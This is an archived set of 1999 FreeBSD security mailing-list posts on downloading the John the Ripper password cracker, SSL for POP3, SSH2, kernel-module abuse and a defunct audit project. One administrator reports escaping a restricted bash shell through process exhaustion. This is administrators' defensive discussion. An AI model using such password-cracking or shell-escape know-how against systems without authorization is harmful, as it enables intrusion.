guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A30A1080096; Sat, 29 May 1999 23:31:38 -0300 Message-ID: <3750761E.7033F669@tdnet.com.br> Date: Sat, 29 May 1999 23:19:58 +0000 From: Unknow User X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: System beeing cracked! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can anybody point me where i can download John ? Paul Hart wrote: > Yes, I would second that opinion. John the Ripper understands many of the > non-DES crypt replacements used in various UNIX versions, such as > FreeBSD's MD5 and OpenBSD's Blowfish, and uses hand-optimized assembly > language versions of the hashing algorithms on many target architectures. -- "The box said 'Requires Windows 98, NT, Linux or better' so I installed FreeBSD." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 19:27:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from pop3-3.enteract.com (pop3-3.enteract.com [207.229.143.32]) by hub.freebsd.org (Postfix) with SMTP id EF1D014CB7 for ; Sat, 29 May 1999 19:27:41 -0700 (PDT) (envelope-from dscheidt@enteract.com) Received: (qmail 44549 invoked from network); 30 May 1999 03:27:44 -0000 Received: from shell-3.enteract.com (dscheidt@207.229.143.42) by pop3-3.enteract.com with SMTP; 30 May 1999 03:27:44 -0000 Received: from localhost (dscheidt@localhost) by shell-3.enteract.com (8.9.3/8.9.2) with SMTP id VAA84387; Sat, 29 May 1999 21:26:36 -0500 (CDT) (envelope-from dscheidt@enteract.com) X-Authentication-Warning: shell-3.enteract.com: dscheidt owned process doing -bs Date: Sat, 29 May 1999 21:26:36 -0500 (CDT) From: David Scheidt To: Unknow User Cc: security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: <3750761E.7033F669@tdnet.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 29 May 1999, Unknow User wrote: > Can anybody point me where i can download John ? > with "unsubscribe freebsd-security" in the body of the message > /usr/ports/security/john if you have the ports collection installed. http://www.freebsd.org/ports/security.html if you haven't. David Scheidt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 20: 4:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id 6324E1515D for ; Sat, 29 May 1999 20:04:17 -0700 (PDT) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id UAA28142; Sat, 29 May 1999 20:03:09 -0700 (PDT) Message-ID: <19990529200308.A20682@best.com> Date: Sat, 29 May 1999 20:03:08 -0700 From: "Jan B. Koum " To: David Scheidt , Unknow User Cc: security@FreeBSD.ORG Subject: Re: System beeing cracked! References: <3750761E.7033F669@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from David Scheidt on Sat, May 29, 1999 at 09:26:36PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 09:26:36PM -0500, David Scheidt wrote: > On Sat, 29 May 1999, Unknow User wrote: > > > Can anybody point me where i can download John ? > > with "unsubscribe freebsd-security" in the body of the message > > > /usr/ports/security/john if you have the ports collection installed. > http://www.freebsd.org/ports/security.html if you haven't. > > David Scheidt And from http://www.false.com/security/john/ for those who don't use ports/packages and like to "roll your own". -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 20:13:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 0607515043 for ; Sat, 29 May 1999 20:13:10 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id NAA14706; Sun, 30 May 1999 13:13:17 +1000 Date: Sun, 30 May 1999 13:13:16 +1000 (EST) From: Nicholas Brawn To: Tushar Patel Cc: security@FreeBSD.ORG Subject: Re: POP3 server with SSL In-Reply-To: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Last year I patched qpopper to use SSL. Seemed to work fine, but I never did get around to trying/writing a proper mail fetcher, or testing whether mail clients that supported ssl could login properly. Anyway, it would depend on your endusers, and whether their clients would be able to download mail adequately. Grab SSL from www.openssl.org and have a tinker. :) Cheers, Nick On Sat, 29 May 1999, Tushar Patel wrote: > Hi, > > We need to allow few people to access their pop3 e-mail over > secure connection. > Is there a way to run pop3 server with SSL support? > Any pointers will be good help. > > Thanks, > Tushar > tpatel @ ecpi.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 20:16:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id 1F8F514D1C for ; Sat, 29 May 1999 20:16:39 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id NAA14750; Sun, 30 May 1999 13:16:35 +1000 Date: Sun, 30 May 1999 13:16:34 +1000 (EST) From: Nicholas Brawn To: Unknow User Cc: security@FreeBSD.ORG Subject: Re: System beeing cracked! In-Reply-To: <3750761E.7033F669@tdnet.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org http://www.false.com/security/ and ftp.freelsd.net/pub/john/ Nick On Sat, 29 May 1999, Unknow User wrote: > Can anybody point me where i can download John ? > > Paul Hart wrote: > > > Yes, I would second that opinion. John the Ripper understands many of the > > non-DES crypt replacements used in various UNIX versions, such as > > FreeBSD's MD5 and OpenBSD's Blowfish, and uses hand-optimized assembly > > language versions of the hashing algorithms on many target architectures. > > -- > "The box said 'Requires Windows 98, NT, Linux or better' so I > installed FreeBSD." > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 20:19:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from zip.com.au (zipper.zip.com.au [203.12.97.1]) by hub.freebsd.org (Postfix) with ESMTP id CD09314E61 for ; Sat, 29 May 1999 20:19:33 -0700 (PDT) (envelope-from ncb@zip.com.au) Received: from localhost (ncb@localhost) by zip.com.au (8.9.1/8.9.1) with ESMTP id NAA14769; Sun, 30 May 1999 13:19:23 +1000 Date: Sun, 30 May 1999 13:19:22 +1000 (EST) From: Nicholas Brawn To: Bryan Fullerton Cc: Dag-Erling Smorgrav , "Harry M. Leitzell" , Fernando Schapachnik , freebsd-security@FreeBSD.ORG Subject: Re: SFTP (was Re: legal notice for telnet/etc) In-Reply-To: <19990529125832.B435@samurai.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org AFAIK, the protocol is public, only the implementation available from ssh.fi is restricted to non-commercial use. Nick On Sat, 29 May 1999, Bryan Fullerton wrote: > On Sat, May 29, 1999 at 04:58:05PM +0200, Dag-Erling Smorgrav wrote: > > "Harry M. Leitzell" writes: > > > I am personally curious as to whether or not someone has developed > > > a free SSH2 daemon yet. > > > > That's a contradiction in terms. AFAIK, the SSH2 protocol is > > proprietary. > > That would surprise the IETF. See http://www.net.lut.ac.uk/psst/ for links to > the IETF working group documents regarding making the ssh2 protocol an > Internet standard, as well as links to a GPL'ed ssh2 implementation (in early > development - currently at v0.1). > > Bryan > > -- > Bryan Fullerton http://www.samurai.com/ > Core Competency > Samurai Consulting > "No, we don't do seppuku." Can you feel the Ohmu call? > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 21:42:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from server.mindstep.com (cr480472-a.slnt1.on.wave.home.com [24.112.33.138]) by hub.freebsd.org (Postfix) with SMTP id 515E31519D for ; Sat, 29 May 1999 21:41:46 -0700 (PDT) (envelope-from patrick@mindstep.com) Received: (qmail 49212 invoked from network); 30 May 1999 04:41:45 -0000 Received: from pm6100.local.mindstep.com (HELO ?192.168.55.3?) (192.168.55.3) by local.mindstep.com with SMTP; 30 May 1999 04:41:45 -0000 X-Mailer: Microsoft Outlook Express Macintosh Edition - 4.5 (0410) Date: Sun, 30 May 1999 00:41:44 -0400 Subject: Re: POP3 server with SSL From: "Patrick Bihan-Faou" To: security@FreeBSD.ORG Mime-version: 1.0 X-Priority: 3 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Message-Id: <19990530044147.515E31519D@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, On Sat, 29 May 1999, Tushar Patel wrote: > We need to allow few people to access their pop3 e-mail over > secure connection. > Is there a way to run pop3 server with SSL support? > Any pointers will be good help. Actually this is really easy to implement using the "stunnel" package (look in the ports area under security) and the "OpenSSL" package (used to be SSLeay). With this combination, you can provide any service you want over SSL and you don't have to recompile anything. Beware though that not too many clients do POP3 over SSL. Notably Netscape does not do it: it only supports IMAP over SSL. There is also a package named bjorb that does the same thing as stunnel, but I did not manage to make it work. Have fun, Patrick. -- Patrick Bihan-Faou, email: patrick.bihan-faou@mindstep.com MindStep Corporation tel: (613) 526 5062 fax: (613) 526 2417 web: www.mindstep.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 29 23:39:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from news.kiev.sovam.com (news.kiev.sovam.com [194.186.143.16]) by hub.freebsd.org (Postfix) with ESMTP id 8D1F015200 for ; Sat, 29 May 1999 23:39:33 -0700 (PDT) (envelope-from mail@news.kiev.sovam.com) Received: from mail by news.kiev.sovam.com with local (Exim 2.12 #1) id 10nzFs-000Osc-00 for freebsd-security@freebsd.org; Sun, 30 May 1999 09:39:32 +0300 From: Vladimir Litovka To: freebsd-security@freebsd.org Reply-To: Vladimir Litovka Subject: Re: POP3 server with SSL Date: 30 May 1999 06:39:31 GMT Message-ID: <7iqmf3$2tcc$1@news.kiev.sovam.com> References: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com> X-Organization: Sovam Teleport Kiev (post does not reflect views of Sovam Teleport) X-Gated-By: news2list v1.3-pl1, (c) Vladimir Litovka X-Gated-Date: Sun May 30 06:39:32 1999 GMT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Tushar Patel" wrote: > Is there a way to run pop3 server with SSL support? > Any pointers will be good help. Why not to use Cyrus IMAP server, which has also pop3d support? Cyrus supports SSL, so you can get many good services in one box :-) Last version of Cyrus server is in ports/mail/cyrus -- doka To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 30 8:11:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 3CC8914D23 for ; Sun, 30 May 1999 08:11:18 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id RAA14812; Sun, 30 May 1999 17:11:08 +0200 (CEST) (envelope-from des) To: "Jan B. Koum " Cc: William Woods , Justin Wolf , FreeBSD Security Subject: Re: System beeing cracked! References: <006201bea999$ee5e4b00$06c3fe90@cisco.com> <000001beaa1c$3b44bf80$264b93cd@william> <19990529170325.A28298@best.com> From: Dag-Erling Smorgrav Date: 30 May 1999 17:11:04 +0200 In-Reply-To: "Jan B. Koum "'s message of "Sat, 29 May 1999 17:03:25 -0700" Message-ID: Lines: 12 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jan B. Koum " writes: > On the other hand, if someone cracks root and you have LKM (or KLD) enabled, > a skilled attacker can just insert a bpf module into a running system I > would guess. There is a paper on how to abuse LKM under linux at: No, The network drivers don't pass packets to bpf_tap() unless NBPFILTER was defined and non-zero at compile time. Even if you could load a bpf module, it wouldn't receive any data. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 30 18:22: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (unknown [206.67.97.83]) by hub.freebsd.org (Postfix) with ESMTP id 2496215342 for ; Sun, 30 May 1999 18:20:29 -0700 (PDT) (envelope-from billf@jade.chc-chimes.com) Received: from localhost (billf@localhost) by jade.chc-chimes.com (8.8.8/8.8.8) with SMTP id VAA23947 for ; Sun, 30 May 1999 21:23:22 -0400 (EDT) (envelope-from billf@jade.chc-chimes.com) Date: Sun, 30 May 1999 21:23:22 -0400 (EDT) From: Bill Fumerola Reply-To: Bill Fumerola To: freebsd-security@FreeBSD.org Subject: auditors Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The file www/en/auditors.sgml is out of date (slightly), I'd fix it but I wonder if it's even a valid page (because of it's lack of reference etc) If it is a valid page, then it should be updated and referenced somewhere in the web site. (Nothing links to it.) Perhaps in www/en/security/securty.sgml, I don't know. Maybe in the handbook or FAQ. Opinions? - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 30 23:48: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from apotheosis.za.org (apotheosis.za.org [137.158.128.27]) by hub.freebsd.org (Postfix) with ESMTP id 1BE7214CFE for ; Sun, 30 May 1999 23:47:49 -0700 (PDT) (envelope-from lonewolf@apotheosis.za.org) Date: Mon, 31 May 1999 08:46:56 +0200 From: Lonewolf To: Tushar Patel Cc: security@FreeBSD.ORG Subject: Re: POP3 server with SSL Message-ID: <19990531084656.A76032@apotheosis.za.org> References: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com>; from "Tushar Patel" on Sat, May 29, 1999 at 06:56:53PM Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 29, 1999 at 06:56:53PM -0500, Tushar Patel wrote: > We need to allow few people to access their pop3 e-mail over secure > connection. > Is there a way to run pop3 server with SSL support? > Any pointers will be good help. I found the following to be very helpfull: Learning SSL the Hard Way - http://www.dtcc.edu/cs/admin/notes/ssl/ There's also SSL Wrap: http://www.rickk.com/sslwrap/ -- lonewolf@apotheosis.za.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 0:40:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (Postfix) with ESMTP id 1635A14CA2 for ; Mon, 31 May 1999 00:40:28 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id JAA28418 for freebsd-security@freebsd.org; Mon, 31 May 1999 09:40:27 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.8.8/8.8.8) id JAA00388 for freebsd-security@freebsd.org; Mon, 31 May 1999 09:35:14 +0200 (CEST) (envelope-from zgabor) From: Zahemszky Gabor Message-Id: <199905310735.JAA00388@CoDe.hu> Subject: Re: POP3 server with SSL In-Reply-To: <19990530044147.515E31519D@hub.freebsd.org> from Patrick Bihan-Faou at "May 30, 99 00:41:44 am" To: freebsd-security@freebsd.org Date: Mon, 31 May 1999 09:35:14 +0200 (CEST) X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hi, > > On Sat, 29 May 1999, Tushar Patel wrote: > > > We need to allow few people to access their pop3 e-mail over > > secure connection. > > Is there a way to run pop3 server with SSL support? > > Any pointers will be good help. > > > Actually this is really easy to implement using the "stunnel" package (look > in the ports area under security) and the "OpenSSL" package (used to be > SSLeay). And there is another one: sslproxy. It isn't at the ports/packages yet, but you can compile and use it. And! it has a windows version, too. By the way, I can't remember the exact url, but somewhere from Austria. ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 1:27:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 7EFAA14F35 for ; Mon, 31 May 1999 01:27:27 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id KAA08381; Mon, 31 May 1999 10:27:21 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id KAA54015; Mon, 31 May 1999 10:27:21 +0200 (MET DST) Date: Mon, 31 May 1999 10:27:21 +0200 From: Eivind Eklund To: Bill Fumerola Cc: freebsd-security@FreeBSD.ORG Subject: Re: auditors Message-ID: <19990531102721.F51991@bitbox.follo.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: ; from Bill Fumerola on Sun, May 30, 1999 at 09:23:22PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 30, 1999 at 09:23:22PM -0400, Bill Fumerola wrote: > The file www/en/auditors.sgml is out of date (slightly), I'd fix it but I > wonder if it's even a valid page (because of it's lack of reference etc) > > If it is a valid page, then it should be updated and referenced somewhere > in the web site. (Nothing links to it.) Perhaps in > www/en/security/securty.sgml, I don't know. Maybe in the handbook or FAQ. > > Opinions? The auditing project has been dead/sleeping for a *long* while. If it should be revived, the first thing to do would be to merge over the OpenBSD fixes, and then have somebody actually *lead* the auditing project. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 2:31:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from exchns01.PQAFRICA.CO.ZA (mail.pqafrica.co.za [196.29.130.34]) by hub.freebsd.org (Postfix) with ESMTP id D7D5E14F36 for ; Mon, 31 May 1999 02:31:14 -0700 (PDT) (envelope-from psivbl@psimr.persetel.co.za) Received: by mail.pqafrica.co.za with Internet Mail Service (5.5.2448.0) id ; Mon, 31 May 1999 11:21:32 +0200 Message-ID: <501BF453CDCFD111A6E40080C83DAC041308C9@PSICS001> From: Vikash Badal * To: "'freebsd-security@FreeBSD.ORG'" Subject: restricted bash Date: Mon, 31 May 1999 11:34:45 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings Can anyone assist me with implementing a restricted bash shell. Currently I am testing a restricted bash shell using the bash 2.01 with the -r option. After creating 64 processes I get a "fork : Resource temporary unavailable" error and cannot execute any command. I have used this error to gain access to an unrestricted bash shell. Is there any way I can prevent anyone from logging in when a "resource temporary unavailable" error occurs ? The kernel is currently 2.2.5 , the restricted shell uses ssh version 1.26 to log into the rest of the network and the box will act as a firewall of sorts. I cannot recompile the kernel as the box was really stripped down by my predecessor. Thanks Vikash NaTIS Information System Security Vikash Badal System Security Administrator Tel : 011-256-1028 Cell: 082-979-3818 Email: psivbl@psimr.persetel.co.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 2:35:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from alexander.pentalpha.com.hk (pop3.pentalpha.com.hk [210.176.109.1]) by hub.freebsd.org (Postfix) with ESMTP id 4E7E314D9B; Mon, 31 May 1999 02:35:08 -0700 (PDT) (envelope-from danny@pentalpha.com.hk) Received: (from uucp@localhost) by alexander.pentalpha.com.hk (8.9.3/8.9.3) id RAA39218; Mon, 31 May 1999 17:35:07 +0800 (CST) (envelope-from danny@pentalpha.com.hk) Received: from danny.pentalpha.com.hk(10.0.0.111), claiming to be "domain" via SMTP by alexander.pentalpha.com.hk, id smtpdd39214; Mon May 31 17:35:07 1999 Message-ID: <04f901beab48$d91ffda0$6f00000a@domain.pentalpha.com.hk> From: "danny" To: , Subject: named.run Date: Mon, 31 May 1999 17:34:57 +0800 MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I found a file named.run in /etc/namedb and the file size is very large. It is the log file of all dns query. Did I set something wrong or I get a attack? Danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 5:14:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 5B19514E66 for ; Mon, 31 May 1999 05:14:24 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA29125; Mon, 31 May 1999 09:13:17 -0300 (GMT) Message-Id: <199905311213.JAA29125@ns1.sminter.com.ar> Subject: Re: POP3 server with SSL In-Reply-To: <000501beaa2e$ff33e080$0300000a@vishnu.ecpi.com> from Tushar Patel at "May 29, 99 06:56:53 pm" To: tpatel@ecpi.com (Tushar Patel) Date: Mon, 31 May 1999 09:13:17 -0300 (GMT) Cc: security@FreeBSD.ORG From: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If they are really few you can use SSH port forwarding. Create an account named, say, ssh on your machine and give it a shell like /bin/cat. Firewall your machine so you can't receive POP3 via ethernet. All that clients must do is stablish an SSH session to your machine and use the ssh account to login. Then they must set up a forwarding like -L 110:your.ip.address:110 and configure their POP3 client to use localhost as the POP3 server. Hope this helps! Regards. En un mensaje anterior, Tushar Patel escribió: > Hi, > > We need to allow few people to access their pop3 e-mail over > secure connection. > Is there a way to run pop3 server with SSL support? > Any pointers will be good help. > > Thanks, > Tushar > tpatel @ ecpi.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA Diagonal Roque Sáenz Peña 971, 4º y 5º piso. 1035 - Capital Federal, Argentina. (54-11) 4323-3333 http://www.via-net-works.net.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 5:16:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.sminter.com.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 6A76A14E66; Mon, 31 May 1999 05:16:12 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA00824; Mon, 31 May 1999 09:16:21 -0300 (GMT) Message-Id: <199905311216.JAA00824@ns1.sminter.com.ar> Subject: Re: named.run In-Reply-To: <04f901beab48$d91ffda0$6f00000a@domain.pentalpha.com.hk> from danny at "May 31, 99 05:34:57 pm" To: danny@pentalpha.com.hk (danny) Date: Mon, 31 May 1999 09:16:21 -0300 (GMT) Cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG From: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You can signal named to dump its cache. Sure you didn't kill -INT'ed it by mistake? Regards. En un mensaje anterior, danny escribió: I found a file named.run in /etc/namedb and the file size is very large. It is the log file of all dns query. Did I set something wrong or I get a attack? Danny Fernando P. Schapachnik Administración de la red VIA Net Works Argentina SA Diagonal Roque Sáenz Peña 971, 4º y 5º piso. 1035 - Capital Federal, Argentina. (54-11) 4323-3333 http://www.via-net-works.net.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 6:41:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id E6D9314BF1 for ; Mon, 31 May 1999 06:41:26 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id RAA29411 for ; Mon, 31 May 1999 17:41:24 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id RAA26314 for ; Mon, 31 May 1999 17:41:22 +0400 (MSD) Date: Mon, 31 May 1999 17:41:21 +0400 (MSD) From: "Ilmar S. Habibulin" To: freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: <19990531102721.F51991@bitbox.follo.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 31 May 1999, Eivind Eklund wrote: > The auditing project has been dead/sleeping for a *long* while. If it > should be revived, the first thing to do would be to merge over the > OpenBSD fixes, and then have somebody actually *lead* the auditing > project. And what about posix auditing? Robert Watson made posix.1e audit implementation for freebsd. Why do not use his work? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 31 10:37:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from narcissus.net (narcissus.net [209.73.230.146]) by hub.freebsd.org (Postfix) with ESMTP id 5788515691 for ; Mon, 31 May 1999 10:37:37 -0700 (PDT) (envelope-from ben@narcissus.net) Received: by narcissus.net (Postfix, from userid 1000) id ED630194; Mon, 31 May 1999 13:28:23 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by narcissus.net (Postfix) with SMTP id E0AD318B; Mon, 31 May 1999 13:28:23 -0400 (EDT) Date: Mon, 31 May 1999 13:28:23 -0400 (EDT) From: Snob Art Genre To: "Ilmar S. Habibulin" Cc: freebsd-security@FreeBSD.ORG Subject: Re: auditors In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 31 May 1999, Ilmar S. Habibulin wrote: > On Mon, 31 May 1999, Eivind Eklund wrote: > > > The auditing project has been dead/sleeping for a *long* while. If it > > should be revived, the first thing to do would be to merge over the > > OpenBSD fixes, and then have somebody actually *lead* the auditing > > project. > > And what about posix auditing? Robert Watson made posix.1e audit > implementation for freebsd. Why do not use his work? Different kind of auditing. The first is people vetting code for security flaws, the second is logging of system events. Ben @narcissus.net -- finally To Unsubscribe: send mail to majordomo@FreeBSD.org 